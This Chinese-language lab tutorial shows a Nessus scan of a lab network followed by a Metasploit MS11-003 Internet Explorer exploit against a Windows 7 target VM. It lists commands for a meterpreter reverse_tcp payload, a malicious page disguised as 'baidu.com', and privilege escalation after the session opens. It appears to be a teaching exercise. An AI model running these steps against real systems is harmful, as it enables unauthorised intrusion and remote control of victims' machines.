1. 程式人生 > 其它 >網安——Metasploit攻擊win7例項

網安——Metasploit攻擊win7例項

利用Nessus掃描目標主機

執行命令 /etc/init.d/nessusd start 啟動Nessus服務

訪問Nessus控制端https://127.0.0.1:8834/

新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

配置掃描資訊,主要設定掃描名稱、描述和掃描目標三個資訊即可,其他配置選擇預設,配置完成點選Save。選擇對整個10.1.1.0/24網段進行掃描

掃描結束後,Nessus會很直觀的顯示出目標網段的安全情況。下圖顯示了整個網段的安全資訊。Nessus將安全問題歸類為Info/Low/Medium/High/Critical五個等級,其中Critical等級的問題是最危險的,Info級別的問題通常是無關痛癢的資訊顯示問題。


重點關注10.1.1.129主機,即win7靶機,Nessus掃描出該主機存在四個最高危漏洞、2個高危漏洞及其它漏洞問題

選中高危漏洞,Nessus給出了該漏洞的介紹、風險資訊、解決方案等詳細資訊。Risk information對於攻擊者來說非常有用,可以根據Risk information去Google搜尋是否存在已知的漏洞利用Exp。

利用MS11_003 IE漏洞攻擊win7主機

1.在kali中執行“msfconsole”,啟動metasploit

2.執行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP

3.執行命令:show options,檢視配置選項

4.設定生成的惡意網頁的URI為baidu.com

執行命令:set URIPATH baidu.com

5.為防止伺服器埠衝突,設定伺服器埠為8060,避開常用埠8080

執行命令:set SRVPORT 8060

6.設定攻擊負載

執行命令:set PAYLOAD windows/meterpreter/reverse_tcp

7.檢視配置選項

執行命令: show options

8.設定HOST以繫結本地IP

set LHOST 10.1.1.128

9.為避免衝突設定LPORT

執行命令:set LPORT 8866

10.執行令“exploit”開始進行攻擊,生成惡意網頁和做好其他準備,只等受害者訪問我們構造的惡意網頁

11.在 Win7靶機開啟IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點選網頁,靶機IE如下圖所示,攻擊者Metasploit顯示如下圖所示資訊表明攻擊成功。

12.驗證攻擊是否成功。列出當前成功建立的回話,任意進入一個回話,檢視攻擊者的身份。可以嘗試使用getsystem進行進一步的提權,如果提權失敗則可以採取上傳提權exe程式進行提權的方案獲得最高許可權。

答題: